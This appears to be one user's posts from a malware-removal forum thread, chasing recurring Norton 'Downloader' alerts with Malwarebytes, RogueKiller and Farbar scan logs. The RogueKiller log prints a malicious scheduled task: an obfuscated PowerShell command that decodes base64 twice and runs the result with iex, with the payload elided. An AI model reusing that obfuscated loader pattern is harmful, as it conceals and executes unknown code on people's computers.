
tammathah

  1. I haven't gotten the pop-up anymore, so yes, all is well. Thank you so much for everything you've done for me.
  2. This is the answer I got from Norton itself:

     Submission Date 2019-04-17 19:51:34
     Tracking # 43173871
     Submitter tamara kinders
     Customer Notes roguekiller sees it as a serious threat but i think its a false positive.

     tamara kinders,
     We have processed your submission (Tracking #43173871) and your submission is now closed. The following is a report of our findings for the files in your submission:

     Submission Summary
     ________________________________
     Files Submitted
     # | Filename | MD5 | Determination | Signature Protection Name | RR Seq#
     1 | NortonSecurity.exe | 229cb9487745972b70b539644ec99d67 | Clean | N/A | N/A

     Developer Notes:
     1. NortonSecurity.exe is a clean file.
     ________________________________
     Assessment
     ________________________________
     File 1: NortonSecurity.exe
     MD5: 229cb9487745972b70b539644ec99d67
     SHA256: 04e0645f72842f9659e805b54aed6744d3425e8270af1d6bb188c434ffaebd94
     Determination: Clean
     Submission Detail: This file is clean.
     ________________________________
  3. Since last night, I haven't gotten a pop-up yet, so I think it's fixed. Also, RogueKiller only found something Norton-related, so I didn't touch that because I don't want my antivirus to be messed up. Fixlog.txt roguekiller2.txt
  4. Malwarebytes
     www.malwarebytes.com

     -Logboekdetails-
     Scandatum: 16-04-19
     Scantijd: 00:35
     Logbestand: bf786ecc-5fce-11e9-9d2d-9cb654f226f2.json

     -Software-informatie-
     Versie: 3.7.1.2839
     Versie componenten: 1.0.563
     Update pakketversie: 1.0.10180
     Licentie: Proef

     -Systeeminformatie-
     Besturingssysteem: Windows 10 (Build 17763.437)
     Processor: x64
     Bestandssysteem: NTFS
     Gebruiker: System

     -Scansamenvatting-
     Scantype: Bedreigingsscan
     Scan geactiveerd door: Scheduler
     Resultaat: Voltooid
     Objecten gescand: 293092
     Dreigingen herkend: 0
     Dreigingen in quarantaine: 0
     Verstreken tijd: 5 min, 38 sec

     -Scanopties-
     Geheugen: Ingeschakeld
     Opstarten: Ingeschakeld
     Bestandssysteem: Ingeschakeld
     Archieven: Ingeschakeld
     Rootkits: Uitgeschakeld
     Heuristiek: Ingeschakeld
     POP: Detectie
     POA: Detectie

     -Scandetails-
     Proces: 0 (Geen kwaadaardige items gedetecteerd)
     Module: 0 (Geen kwaadaardige items gedetecteerd)
     Registersleutel: 0 (Geen kwaadaardige items gedetecteerd)
     Registerwaarde: 0 (Geen kwaadaardige items gedetecteerd)
     Registerdata: 0 (Geen kwaadaardige items gedetecteerd)
     Gegevensstroom: 0 (Geen kwaadaardige items gedetecteerd)
     Map: 0 (Geen kwaadaardige items gedetecteerd)
     Bestand: 0 (Geen kwaadaardige items gedetecteerd)
     Fysieke sector: 0 (Geen kwaadaardige items gedetecteerd)
     WMI: 0 (Geen kwaadaardige items gedetecteerd)

     (end)

     ====

     RogueKiller Anti-Malware V13.1.9.0 (x64) [Mar 27 2019] (Free) by Adlice Software
     mail : https://adlice.com/contact/
     Website : https://adlice.com/download/roguekiller/
     Operating System : Windows 10 (10.0.17763) 64 bits
     Started in : Normal mode
     User : Gebruiker [Administrator]
     Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
     Signatures : 20190326_132530, Driver : Loaded
     Mode : Standard Scan, Scan -- Date : 2019/04/16 00:46:11 (Duration : 00:08:58)
     Switches : -refid 3

     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     [Suspicious.Path (Potentially Malicious)] \Microsoft\Windows\UNP\UNP -- powershell.exe [-c "$ddd = '…';iex('$'+'d=''…'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')"] -> Found
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     Hosts file is too big
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
     [PUP.Gen1 (Potentially Malicious)] (folder) Free Registry Cleaner -- C:\Users\Gebruiker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner -> Found
     [Adw.Xunlei (Malicious)] (folder) Thunder Network -- C:\ProgramData\Thunder Network -> Found
     [BitMiner.Gen0 (Malicious)] (folder) Windows -- C:\ProgramData\Windows -> Found
     ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
  5. The task isn't found in the Addition log.

     === log registry:
     Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
     Gestart door Gebruiker (14-04-2019 16:19:11)
     Gestart vanaf C:\Users\Gebruiker\Desktop
     Boot Modus: Normal

     ================== Zoeken in register: "1.vbs" ===========

     ====== Einde van Zoeken ======

     === file search button:
     Farbar Recovery Scan Tool (x64) Versie: 17.03.2019
     Gestart door Gebruiker (14-04-2019 16:20:01)
     Gestart vanaf C:\Users\Gebruiker\Desktop
     Boot Modus: Normal

     ================== Bestanden Zoeken: "1.vbs" =============

     ====== Einde van Zoeken ======
  6. I have Waterfox, Edge and Internet Explorer. I wasn't using a browser at all when it popped up during startup. I can even play a game, have no browsers open, and then it pops up as well.
  7. No, it didn't. I deleted Firefox and deleted the appdata. As soon as I rebooted, the popup from Norton was there again. I haven't installed Firefox yet.
  8. It isn't fixed; I just got the popup again saying auto protect had removed safety risk CL.Downloader!Gen11.
  9. Hello, every 20 minutes I get a pop-up from Norton telling me it has blocked dl.downloader!gen11 and has deleted it. I can't find any other information besides that it is linked to powershell.exe. When I run Norton, it doesn't find a thing; when I run antimalwarebytes, it doesn't find a thing. It looks like my system is clean and yet I can't get rid of the pop-up. Can anyone help me please? 20190412 malwarebytes rapport.txt Addition.txt FRST.txt